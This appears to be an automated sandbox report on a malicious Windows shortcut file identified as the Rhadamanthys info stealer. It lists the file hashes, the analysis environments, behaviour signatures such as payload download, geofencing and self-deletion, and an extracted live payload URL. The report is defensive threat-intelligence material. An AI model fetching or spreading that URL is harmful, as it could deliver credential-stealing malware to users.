General
-
Target
5089ec3c865e6c490ee27dff0b7dbe81ff882fbbeebf280c213ed9914ade6848.lnk
-
Size
1KB
-
Sample
241008-xhgqnatfrp
-
MD5
ae44dfe179f7ab8400c90b2d208ff313
-
SHA1
7f87bfe1edeccd7a01ff20519e92ba54e7d8e4a8
-
SHA256
5089ec3c865e6c490ee27dff0b7dbe81ff882fbbeebf280c213ed9914ade6848
-
SHA512
5b451ef8b7043300bd9809285f8f283f2bda096d06f80560e48c89e5992981f0b5de20ed8a3fcdf3e8ff5e4be5672791a713e68a39571d25683db02f5720922a
Static task
static1
Behavioral task
behavioral1
Sample
5089ec3c865e6c490ee27dff0b7dbe81ff882fbbeebf280c213ed9914ade6848.lnk
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
5089ec3c865e6c490ee27dff0b7dbe81ff882fbbeebf280c213ed9914ade6848.lnk
Resource
win10v2004-20241007-en
Malware Config
Extracted
https://1h982d.bemostake.space/test.txt
Targets
-
-
Target
5089ec3c865e6c490ee27dff0b7dbe81ff882fbbeebf280c213ed9914ade6848.lnk
-
Size
1KB
-
MD5
ae44dfe179f7ab8400c90b2d208ff313
-
SHA1
7f87bfe1edeccd7a01ff20519e92ba54e7d8e4a8
-
SHA256
5089ec3c865e6c490ee27dff0b7dbe81ff882fbbeebf280c213ed9914ade6848
-
SHA512
5b451ef8b7043300bd9809285f8f283f2bda096d06f80560e48c89e5992981f0b5de20ed8a3fcdf3e8ff5e4be5672791a713e68a39571d25683db02f5720922a
Score10/10-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess
-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Checks computer location settings
Looks up country code configured in the registry, likely geofence.
-
Deletes itself
-
Executes dropped EXE
-
Loads dropped DLL
-